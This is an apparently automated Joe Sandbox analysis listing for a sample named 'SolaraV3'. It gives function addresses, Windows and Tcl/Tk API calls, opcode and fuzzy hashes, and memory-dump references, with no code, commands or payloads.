Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
Instruction ID: 8909cbd613fb996e1adbe582df758805a12db95160e7ff03f5ba0144f44b099d
Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
Instruction Fuzzy Hash: 07512921B0928986F7649A2D942467E6691BF44BF4F18A737DD7D837C9CE3CE4239600

Function 00007FF6DC71C134 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF6DC71C2CD), ref: 00007FF6DC71C180
GetLastError.KERNEL32(?,?,?,?,?,00007FF6DC71C2CD), ref: 00007FF6DC71C18A

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
Instruction ID: d8f8231e8349ab292ba8546ab0b2e6506ccfc607cb20df7be546b439c22b0af1
Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
Instruction Fuzzy Hash: 0311C471B18A8581DA208B69A82416DB361FB45FF4F545332EE7D877D9CE7CD0228700

Function 00007FF6DC71A948 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,?,?,00007FF6DC722D22,?,?,?,00007FF6DC722D5F,?,?,00000000,00007FF6DC723225,?,?,?,00007FF6DC723157), ref: 00007FF6DC71A95E
GetLastError.KERNEL32(?,?,?,00007FF6DC722D22,?,?,?,00007FF6DC722D5F,?,?,00000000,00007FF6DC723225,?,?,?,00007FF6DC723157), ref: 00007FF6DC71A968

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
Instruction ID: 0094c6eaa3d4d63496d20ff8e69808eeffa1c6b15ae0b44f8721ca82363fe342
Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
Instruction Fuzzy Hash: 2DE08C50F0920E43FF296BF6A86513C5651AF88B00F455036C80EC22A2EE2CA8A78710

Function 00007FF6DC71AB58 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,00007FF6DC71A9D5,?,?,00000000,00007FF6DC71AA8A), ref: 00007FF6DC71ABC6
GetLastError.KERNEL32(?,?,?,00007FF6DC71A9D5,?,?,00000000,00007FF6DC71AA8A), ref: 00007FF6DC71ABD0

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
Instruction ID: 0c11eec4320f1b1e243678bd6dbc2af7e9d367a760fc7e2fddad315d07596af5
Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
Instruction Fuzzy Hash: 0821D811F1C68A41FAB157A994B037D12929F84BB0F18633BD92EC77D1CE6CE5634300

Function 00007FF6DC71BEAC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC71BED4

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
Instruction ID: c65993b15f576a6d6c905b041e5978778d586cff82d162d69b6a1a4842970028
Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
Instruction Fuzzy Hash: 9441E37291824987EA349B2DA56027D73A5EB59B90F142132EB9EC36D1CF3CE423CB50

Function 00007FF6DC707F90 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF6DC70803A

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: e52dbf74210c3068f283d652883a2533e96d5b0e990d8b056fb852a210ac9877
Instruction ID: 43ac1281434680340e6cfb263e4c3bcf2b72f214817af0faecd78219c4513109
Opcode Fuzzy Hash: e52dbf74210c3068f283d652883a2533e96d5b0e990d8b056fb852a210ac9877
Instruction Fuzzy Hash: 4621F721B1865A46FA109B2368143FE9661BF45BD4F8C5432EE4C8B786CE7EE063C700

Function 00007FF6DC71B93C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC71B9C2

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
Instruction ID: f8422d1c04b205098efb05b2fecd43552efd24ecbfcf616639df63dd37548e03
Opcode Fuzzy Hash: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
Instruction Fuzzy Hash: 5D31A462A1861A85F7116F6D886137C2A94BF80BA0F522237E95D933D2CF7CE4678711

Function 00007FF6DC719961 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6DC71998F

Part of subcall function 00007FF6DC719A88: GetModuleHandleExW.KERNEL32 ref: 00007FF6DC719AAD
Part of subcall function 00007FF6DC719A88: GetProcAddress.KERNEL32 ref: 00007FF6DC719AC3
Part of subcall function 00007FF6DC719A88: FreeLibrary.KERNEL32 ref: 00007FF6DC719AEA

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
Instruction ID: eaf5c8eca6daf4d6e496b53cbd00a04a137c9a539a3609aa8592d1be781f906c
Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
Instruction Fuzzy Hash: 8521AE72E047898AEB249F68C4942EC37A0FB44718F442637D76D86AC5DF38D5A7C740

Function 00007FF6DC715F94 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC715EF9

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction ID: 80008af62441f8f444589d6e03f262c18b15e8bfb9f3c72daf03557e33d7fd16
Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction Fuzzy Hash: 33118731E1C64981FAA59F19942017DA368BF85B94F546433FB4CD7B96CF3DD4228700

Function 00007FF6DC726354 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC726377

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
Instruction ID: f3a74f9fbda2858e96c7fdfd1565a5dba3ee2ddc81fea37d2288d50cdd7beae5
Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
Instruction Fuzzy Hash: 9921A432A18A4587EB719F58D45037DB7A0FB84B54F24423AEA9DC76DADF3CD4228B00

Function 00007FF6DC7103BC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC710410

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction ID: 6366436472c9eb8353529533f2eb0bfa139cdc9fdd466ed8a60788a2df9f1f45
Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction Fuzzy Hash: B801C821A0874940E604DF5B995006DA695BF86FE0F5C5632DE6C97BD6CE3CE4238300

Function 00007FF6DC717EFC Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC717F3A

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: eb4e03bbc0b04cbc85d5aa4284f536322b5632f0a5d263bd1b62b358e696f9c3
Instruction ID: f56a13c214a361c893b1f9058410c9ef5440578e9797bf3fae1d22332897dc35
Opcode Fuzzy Hash: eb4e03bbc0b04cbc85d5aa4284f536322b5632f0a5d263bd1b62b358e696f9c3
Instruction Fuzzy Hash: C801DE20E0D68B40FE616B69652117E1A98AF247E0F546237FA1CD76CADF3CE473CA00

Function 00007FF6DC718238 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC718251

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
Instruction ID: f3366009d493c80ef776051e6e1c7f1339fc37eb24446877b0518aaa1f623241
Opcode Fuzzy Hash: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
Instruction Fuzzy Hash: 1BE08C90F0C60E87FA133BAC04A21BC11244FA5340F55A232ED08873C3DD6C68775621

Function 00007FF6DC71EB98 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,00000000,00007FF6DC71B32A,?,?,?,00007FF6DC714F11,?,?,?,?,00007FF6DC71A48A), ref: 00007FF6DC71EBED

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
Instruction ID: 699b7c16cbe04b44acb68e32cd3b50197d2fa747267ac9395e4bab95021e8c1c
Opcode Fuzzy Hash: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
Instruction Fuzzy Hash: 8CF09054F0920F41FE695B6E98797BC52845F88B80F4CA532CD0FC63C2EE1CE6A34210

Function 00007FF6DC71D5FC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF6DC710C90,?,?,?,00007FF6DC7122FA,?,?,?,?,?,00007FF6DC713AE9), ref: 00007FF6DC71D63A

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
Instruction ID: 99ec219f8cf046e9289f3b5593592994e25866adea525afe5e7e9f8b82c70968
Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
Instruction Fuzzy Hash: D4F08210F0C20F45FE661775582527C12944FD47E0F082732DC2EC62C2DE3CA4A38910

Non-executed Functions

Function 00007FF6DC7076C0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF6DC7076D7
GetLastError.KERNEL32 ref: 00007FF6DC7076E9
GetProcAddress.KERNEL32 ref: 00007FF6DC707725
GetLastError.KERNEL32 ref: 00007FF6DC707737
GetProcAddress.KERNEL32 ref: 00007FF6DC707750
GetLastError.KERNEL32 ref: 00007FF6DC707762
GetProcAddress.KERNEL32 ref: 00007FF6DC70777B
GetLastError.KERNEL32 ref: 00007FF6DC70778D
GetProcAddress.KERNEL32 ref: 00007FF6DC7077A9
GetLastError.KERNEL32 ref: 00007FF6DC7077BB
GetProcAddress.KERNEL32 ref: 00007FF6DC7077D7
GetLastError.KERNEL32 ref: 00007FF6DC7077E9
GetProcAddress.KERNEL32 ref: 00007FF6DC707805
GetLastError.KERNEL32 ref: 00007FF6DC707817
GetProcAddress.KERNEL32 ref: 00007FF6DC707833
GetLastError.KERNEL32 ref: 00007FF6DC707845
GetProcAddress.KERNEL32 ref: 00007FF6DC707861
GetLastError.KERNEL32 ref: 00007FF6DC707873

Strings

Failed to get address for %hs, xrefs: 00007FF6DC7076F8
Tcl_NewStringObj, xrefs: 00007FF6DC707ADB, 00007FF6DC707AFD
Tcl_Finalize, xrefs: 00007FF6DC70779F, 00007FF6DC7077C1
Tcl_DoOneEvent, xrefs: 00007FF6DC707771, 00007FF6DC707793
Tcl_EvalEx, xrefs: 00007FF6DC707BC1, 00007FF6DC707BE3
Tcl_SetVar2, xrefs: 00007FF6DC707A51, 00007FF6DC707A73
Tcl_GetCurrentThread, xrefs: 00007FF6DC707857, 00007FF6DC707879
Tcl_Alloc, xrefs: 00007FF6DC707C1D, 00007FF6DC707C3F
Tcl_CreateThread, xrefs: 00007FF6DC707829, 00007FF6DC70784B
Tcl_ThreadAlert, xrefs: 00007FF6DC7079F5, 00007FF6DC707A17
Tcl_FinalizeThread, xrefs: 00007FF6DC7077CD, 00007FF6DC7077EF
Tcl_CreateInterp, xrefs: 00007FF6DC70771B, 00007FF6DC70773D
Tcl_FindExecutable, xrefs: 00007FF6DC707746, 00007FF6DC707768
Tcl_Init, xrefs: 00007FF6DC7076D0, 00007FF6DC7076EF
Tcl_Free, xrefs: 00007FF6DC707C4B, 00007FF6DC707C6D
Tcl_GetObjResult, xrefs: 00007FF6DC707B65, 00007FF6DC707B87
Tcl_CreateObjCommand, xrefs: 00007FF6DC707A7F, 00007FF6DC707AA1
Tcl_MutexFinalize, xrefs: 00007FF6DC70790F, 00007FF6DC707931
Tcl_EvalFile, xrefs: 00007FF6DC707B93, 00007FF6DC707BB5
Tk_Init, xrefs: 00007FF6DC707C79, 00007FF6DC707C9B
Tcl_ThreadQueueEvent, xrefs: 00007FF6DC7079C7, 00007FF6DC7079E9
Tcl_GetString, xrefs: 00007FF6DC707AAD, 00007FF6DC707ACF
Tcl_JoinThread, xrefs: 00007FF6DC707885, 00007FF6DC7078A7
GetProcAddress, xrefs: 00007FF6DC7076FF
Tcl_NewByteArrayObj, xrefs: 00007FF6DC707B09, 00007FF6DC707B2B
Tcl_MutexUnlock, xrefs: 00007FF6DC7078E1, 00007FF6DC707903
Tk_GetNumMainWindows, xrefs: 00007FF6DC707CA7, 00007FF6DC707CC9
Tcl_EvalObjv, xrefs: 00007FF6DC707BEF, 00007FF6DC707C11
Tcl_ConditionNotify, xrefs: 00007FF6DC70796B, 00007FF6DC70798D
Tcl_DeleteInterp, xrefs: 00007FF6DC7077FB, 00007FF6DC70781D
Tcl_ConditionFinalize, xrefs: 00007FF6DC70793D, 00007FF6DC70795F
Tcl_GetVar2, xrefs: 00007FF6DC707A23, 00007FF6DC707A45
Tcl_SetVar2Ex, xrefs: 00007FF6DC707B37, 00007FF6DC707B59
Tcl_ConditionWait, xrefs: 00007FF6DC707999, 00007FF6DC7079BB
Tcl_MutexLock, xrefs: 00007FF6DC7078B3, 00007FF6DC7078D5

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 199729137-3427451314
Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
Instruction ID: 91f8c131e1af8d518885a39eb8fd539c91bda2667e277093d0ec9d07a938cc97
Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
Instruction Fuzzy Hash: 7A029524A0EB0FD5FA359B56E8645BCA3A1AF18745F941037D82E82260EF3CB56BD704

Function 00007FF6DC7240AC Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 00007FF6DC7240FA
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC724766
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC7248DC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC724B9A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC724DBA
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC724FF7
memcpy_s.LIBCPMT ref: 00007FF6DC7250D2
memcpy_s.LIBCPMT ref: 00007FF6DC72517D
